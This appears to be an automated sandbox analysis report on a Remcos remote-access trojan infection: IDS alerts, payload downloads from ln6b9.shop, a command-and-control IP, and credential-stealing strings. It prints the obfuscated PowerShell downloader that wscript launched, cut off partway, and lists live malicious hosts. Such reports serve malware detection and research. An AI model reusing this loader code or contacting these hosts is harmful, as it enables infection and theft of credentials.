              Source: Yara matchFile source: 00000009.00000002.3406381912.0000000007BCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6448, type: MEMORYSTR
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000004.00000002.2477154181.00000000079A7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2477154181.00000000079CC000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tem.Core.pdb source: powershell.exe, 00000004.00000002.2447632950.00000000033DE000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_235910F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_235910F1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_23596580 FindFirstFileExA,9_2_23596580
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0040AE51 FindFirstFileW,FindNextFileW,12_2_0040AE51
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407EF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898

              Software Vulnerabilities

              barindex
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49928 -> 154.216.18.65:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49939 -> 154.216.18.65:2404
              Source: Malware configuration extractorURLs: 154.216.18.65
              Source: global trafficTCP traffic: 192.168.2.6:49928 -> 154.216.18.65:2404
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49945 -> 178.237.33.50:80
              Source: global trafficHTTP traffic detected: GET /amykhRcM/Redobling.psd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: ln6b9.shopConnection: Keep-Alive
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.65
              Source: global trafficHTTP traffic detected: GET /amykhRcM/Redobling.psd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: ln6b9.shopConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /OxvwnGPq/OGaqsWdpjAA232.bin HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: ln6b9.shopCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: msiexec.exe, 00000009.00000002.3418548340.0000000023560000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: msiexec.exeString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: msiexec.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: msiexec.exe, 00000009.00000002.3418729616.00000000239E0000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: msiexec.exe, 00000009.00000002.3418729616.00000000239E0000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: ln6b9.shop
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: wscript.exe, 00000000.00000003.2115614300.0000022327AE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2140785929.0000022327A9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2140092051.0000022327A9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139577582.0000022327A8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: wscript.exe, 00000000.00000003.2115614300.0000022327AE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2140785929.0000022327A9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2140092051.0000022327A9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139577582.0000022327A8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: wscript.exe, 00000000.00000003.2115614300.0000022327AE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: wscript.exe, 00000000.00000003.2115614300.0000022327AE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: wscript.exe, 00000000.00000003.2115614300.0000022327AE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2140785929.0000022327A9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2140092051.0000022327A9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139577582.0000022327A8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: wscript.exe, 00000000.00000003.2115614300.0000022327AE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: wscript.exe, 00000000.00000003.2124657554.00000223299DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2124657554.00000223299DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
              Source: wscript.exe, 00000000.00000002.2140785929.0000022327A9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2140092051.0000022327A9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139577582.0000022327A8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: wscript.exe, 00000000.00000002.2140785929.0000022327A9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2140092051.0000022327A9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139577582.0000022327A8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/eny
              Source: wscript.exe, 00000000.00000003.2124542532.0000022327AFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?47ca4706dc
              Source: msiexec.exe, 00000009.00000002.3406381912.0000000007B8A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3406381912.0000000007BE1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2595621774.0000000007C09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: msiexec.exe, 00000009.00000003.2595621774.0000000007C09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gphy
              Source: msiexec.exe, 00000009.00000002.3406381912.0000000007BE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gps
              Source: powershell.exe, 00000002.00000002.2253827455.000001DB4A986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2253827455.000001DB4C444000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2253827455.000001DB4C4F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ln6b9.shop
              Source: msiexec.exe, 00000009.00000002.3406381912.0000000007B8A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3407261487.0000000007ED0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ln6b9.shop/OxvwnGPq/OGaqsWdpjAA232.bin
              Source: powershell.exe, 00000002.00000002.2253827455.000001DB4A986000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ln6b9.shop/amykhRcM/Redobling.psdP
              Source: powershell.exe, 00000004.00000002.2450890121.0000000005048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ln6b9.shop/amykhRcM/Redobling.psdXR
              Source: powershell.exe, 00000002.00000002.2280629575.000001DB5A7CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2468395369.0000000005F56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: wscript.exe, 00000000.00000003.2115614300.0000022327AE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: wscript.exe, 00000000.00000003.2115614300.0000022327AE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: wscript.exe, 00000000.00000003.2115614300.0000022327AE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2140785929.0000022327A9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2140092051.0000022327A9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139577582.0000022327A8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: powershell.exe, 00000004.00000002.2450890121.0000000005048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2253827455.000001DB4A761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2450890121.0000000004EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.2450890121.0000000005048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: msiexec.exeString found in binary or memory: http://www.ebuddy.com
              Source: msiexec.exeString found in binary or memory: http://www.imvu.com
              Source: msiexec.exe, 00000009.00000002.3418548340.0000000023560000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: msiexec.exe, 00000009.00000002.3418548340.0000000023560000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: msiexec.exeString found in binary or memory: http://www.nirsoft.net/
              Source: powershell.exe, 00000002.00000002.2253827455.000001DB4A761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000004.00000002.2450890121.0000000004EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000004.00000002.2468395369.0000000005F56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.2468395369.0000000005F56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.2468395369.0000000005F56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000004.00000002.2450890121.0000000005048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.2253827455.000001DB4B31A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: msiexec.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: powershell.exe, 00000002.00000002.2280629575.000001DB5A7CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2468395369.0000000005F56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: msiexec.exeString found in binary or memory: https://www.google.com
              Source: msiexec.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0041183A OpenClipboard,GetLastError,12_2_0041183A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,12_2_0040987A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_004098E2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_00406DFC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_00406E9F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_004068B5
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,14_2_004072B5

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000009.00000002.3406381912.0000000007B8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3406381912.0000000007BE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3406381912.0000000007BCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6448, type: MEMORYSTR

              System Summary

              barindex
              Source: Initial file: Call Pluricipital.ShellExecute(Zoophytography165, Chr(34) & Faire182 & Chr(34), "", "", Balloteres)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Offentlighedslovgivninger Raakremers Miljforstyrrelserne Daarligst Coniferous #>;$selsret='Valgets';<#Glattede Microscopal Jordvarmeanlggets Confirmatory Onerative Rheobase #>;$Dks=$Leuma+$host.UI;If ($Dks) {$syltetjskrukke++;}function Capulet43($Blimpishly){$Unvomitednefficiencies=$Berendo+$Blimpishly.'Length'-$syltetjskrukke; for( $Unvomited=3;$Unvomited -lt $Unvomitednefficiencies;$Unvomited+=4){$Mythol++;$Overpositiveness+=$Blimpishly[$Unvomited];$Fatalismens='Usurption';}$Overpositiveness;}function Donought($Folkeskolerne){ & ($afire) ($Folkeskolerne);}$Prestigiously100=Capulet43 'BloMCheo rz dei MulDerlsvia En/Ret ';$Prestigiously100+=Capulet43 'Ca 5Kae. Mo0sk I,d(D pWGa.isvune.edBodoOpdwConsCre Ph,N K.T ac b m1Nob0Fol. ,a0di ;Met RbdW ,ai,tin.or6 No4Bou;Tr, Tex .a6N t4 Un;Ret sp.rCouvF l:No,1In 3 Mi1Eld.Par0Al.)Tur GerGMyresrncAssk Bro De/B g2Tat0B r1Bro0 s 0P.r1Rev0Unm1.ro OrrFGl iBegr Que.rofOrio Opxmav/T,r1Kin3U e1 sk.Mic0Jos ';$Extrality=Capulet43 ' yguseksDefefi R Af-Am,AOpsgTrvetraNTret .n ';$Dolkhalerne=Capulet43 'Naph HatLvhtPropFu.:Bef/Ter/GyslsemnFem6BokbEl,9sub.Unes UnhVe oegap os/RalaQuimrecy.edkD.thsukRL ec BiMRet/ FlR ReeDigdsteoZn b relseliConn,ingPhi.Fo pPrissbed ,o ';$Unvomitednddelingens=Capulet43 'P.a> si ';$afire=Capulet43 'BilIEupEsp XE,t ';$Ceratitidae='goldsmithing';$Udskrivningsprogrammets='\Enspnderen.rep';Donought (Capulet43 'sun$GraG ,oLHenOTomB ekaA rL Uf: ,aMR,sEDiadEnsIBlgCC liBioN LnE,ar=Ple$P geWo,nYv vnav:s cAUdspHiePBesDMisAEuttsmaA T,+Eph$Fa URygdPies.ymK laR GliBayvLisnAzoI KoNskrg RisRdlpsalRRygoD sG E R .yA ChmlapMMule .rTMo s la ');Donought (Capulet43 'spi$UdmgCrilManO urBIm.a lmL Fo:Park WoOMe nInsssv oFolL siiEksdT aEFilr iqIMurnc.aGC,s=Eja$DegD Beos.plslaksarHOstaParLTile U RfirNspje Fu. issLizPUnplPeriK fTMul( y$ PoUArbN unvBuro,remsayiFletB,lEOs DB nn RedsotDGr.EsimLBeniOveNFi gProE NonNevsBge)Red ');Donought (Capulet43 'Cyk[L,nnHypERenT od. s sF.nECauRLynvDatIMa cMulescep jaoProI spnNontTemMHj AImpn.veACapgTacEEquR Re]De :,mp:Ra,sM seModc enUVinrD ciC ltAmpyGripGriRRoro HetHanO H C B ORe l.og En =r r pit[Inan isE NoTsk..AutsNatEFl c R U D RTraI.abT esYM.gP nrM no agT e OObdC ysoF iLBrst say,aspAdeeUbe]Gro:sem:Ka tsp Ls isPou1 La2 a ');$Dolkhalerne=$Konsolidering[0];$skovskadens177=(Capulet43 ' st$TilgP slHa Om sbI.da P LR v: aFMu.ONond BafLansN nT,ndEHypRkonNAftE elss a= HvnHocE OswFib-sa,oshiBsubj CrER dC eaTG r ErysCurY ,gsValtUndE t,mDoc.UnvN.paE FotK.n.IntW sye keB uc I L ri roeZenn ReTCou ');Donought ($skovskadens177);Donought (Capulet43 'Acc$MasfunpoOpbdUnsfOptsun t Aresk rHy n nueAfdsCa . H H.rseAfgaG odKnie InrbarsGry[In $P oEUn xD ttVierArtaUfolFriiVoctC uyPre] .t=Ena$ L,PTo,rE.beForsKu tApoiNongCo,iTetoshiuDa sIn.l.alysla1ste0 Ab0Raa ');$Taarnfalkes=Capulet43 'K e$KryfDhuoProdFrsf .asMeutvereFrorskrnUdbeVens rg.FraDT ao PowkacnUdblskrorepa skd saFMo i RelBl
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Offentlighedslovgivninger Raakremers Miljforstyrrelserne Daarligst Coniferous #>;$selsret='Valgets';<#Glattede Microscopal Jordvarmeanlggets Confirmatory Onerative Rheobase #>;$Dks=$Leuma+$host.UI;If ($Dks) {$syltetjskrukke++;}function Capulet43($Blimpishly){$Unvomitednefficiencies=$Berendo+$Blimpishly.'Length'-$syltetjskrukke; for( $Unvomited=3;$Unvomited -lt $Unvomitednefficiencies;$Unvomited+=4){$Mythol++;$Overpositiveness+=$Blimpishly[$Unvomited];$Fatalismens='Usurption';}$Overpositiveness;}function Donought($Folkeskolerne){ & ($afire) ($Folkeskolerne);}$Prestigiously100=Capulet43 'BloMCheo rz dei MulDerlsvia En/Ret ';$Prestigiously100+=Capulet43 'Ca 5Kae. Mo0sk I,d(D pWGa.isvune.edBodoOpdwConsCre Ph,N K.T ac b m1Nob0Fol. ,a0di ;Met RbdW ,ai,tin.or6 No4Bou;Tr, Tex .a6N t4 Un;Ret sp.rCouvF l:No,1In 3 Mi1Eld.Par0Al.)Tur GerGMyresrncAssk Bro De/B g2Tat0B r1Bro0 s 0P.r1Rev0Unm1.ro OrrFGl iBegr Que.rofOrio Opxmav/T,r1Kin3U e1 sk.Mic0Jos ';$Extrality=Capulet43 ' yguseksDefefi R Af-Am,AOpsgTrvetraNTret .n ';$Dolkhalerne=Capulet43 'Naph HatLvhtPropFu.:Bef/Ter/GyslsemnFem6BokbEl,9sub.Unes UnhVe oegap os/RalaQuimrecy.edkD.thsukRL ec BiMRet/ FlR ReeDigdsteoZn b relseliConn,ingPhi.Fo pPrissbed ,o ';$Unvomitednddelingens=Capulet43 'P.a> si ';$afire=Capulet43 'BilIEupEsp XE,t ';$Ceratitidae='goldsmithing';$Udskrivningsprogrammets='\Enspnderen.rep';Donought (Capulet43 'sun$GraG ,oLHenOTomB ekaA rL Uf: ,aMR,sEDiadEnsIBlgCC liBioN LnE,ar=Ple$P geWo,nYv vnav:s cAUdspHiePBesDMisAEuttsmaA T,+Eph$Fa URygdPies.ymK laR GliBayvLisnAzoI KoNskrg RisRdlpsalRRygoD sG E R .yA ChmlapMMule .rTMo s la ');Donought (Capulet43 'spi$UdmgCrilManO urBIm.a lmL Fo:Park WoOMe nInsssv oFolL siiEksdT aEFilr iqIMurnc.aGC,s=Eja$DegD Beos.plslaksarHOstaParLTile U RfirNspje Fu. issLizPUnplPeriK fTMul( y$ PoUArbN unvBuro,remsayiFletB,lEOs DB nn RedsotDGr.EsimLBeniOveNFi gProE NonNevsBge)Red ');Donought (Capulet43 'Cyk[L,nnHypERenT od. s sF.nECauRLynvDatIMa cMulescep jaoProI spnNontTemMHj AImpn.veACapgTacEEquR Re]De :,mp:Ra,sM seModc enUVinrD ciC ltAmpyGripGriRRoro HetHanO H C B ORe l.og En =r r pit[Inan isE NoTsk..AutsNatEFl c R U D RTraI.abT esYM.gP nrM no agT e OObdC ysoF iLBrst say,aspAdeeUbe]Gro:sem:Ka tsp Ls isPou1 La2 a ');$Dolkhalerne=$Konsolidering[0];$skovskadens177=(Capulet43 ' st$TilgP slHa Om sbI.da P LR v: aFMu.ONond BafLansN nT,ndEHypRkonNAftE elss a= HvnHocE OswFib-sa,oshiBsubj CrER dC eaTG r ErysCurY ,gsValtUndE t,mDoc.UnvN.paE FotK.n.IntW sye keB uc I L ri roeZenn ReTCou ');Donought ($skovskadens177);Donought (Capulet43 'Acc$MasfunpoOpbdUnsfOptsun t Aresk rHy n nueAfdsCa . H H.rseAfgaG odKnie InrbarsGry[In $P oEUn xD ttVierArtaUfolFriiVoctC uyPre] .t=Ena$ L,PTo,rE.beForsKu tApoiNongCo,iTetoshiuDa sIn.l.alysla1ste0 Ab0Raa ');$Taarnfalkes=Capulet43 'K e$KryfDhuoProdFrsf .asMeutvereFrorskrnUdbeVens rg.FraDT ao PowkacnUdblskrorepa skd saFMo i RelBlJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00401806 NtdllDefWindowProc_W,12_2_00401806
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004018C0 NtdllDefWindowProc_W,12_2_004018C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004016FD NtdllDefWindowProc_A,13_2_004016FD
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004017B7 NtdllDefWindowProc_A,13_2_004017B7
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00402CAC NtdllDefWindowProc_A,14_2_00402CAC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00402D66 NtdllDefWindowProc_A,14_2_00402D66
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3455B2862_2_00007FFD3455B286
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3455C0322_2_00007FFD3455C032
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD345566452_2_00007FFD34556645
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD345516C92_2_00007FFD345516C9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04EDF3404_2_04EDF340
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04EDFC104_2_04EDFC10
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04EDEFF84_2_04EDEFF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2359B5C19_2_2359B5C1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_235A71949_2_235A7194
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044B04012_2_0044B040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0043610D12_2_0043610D
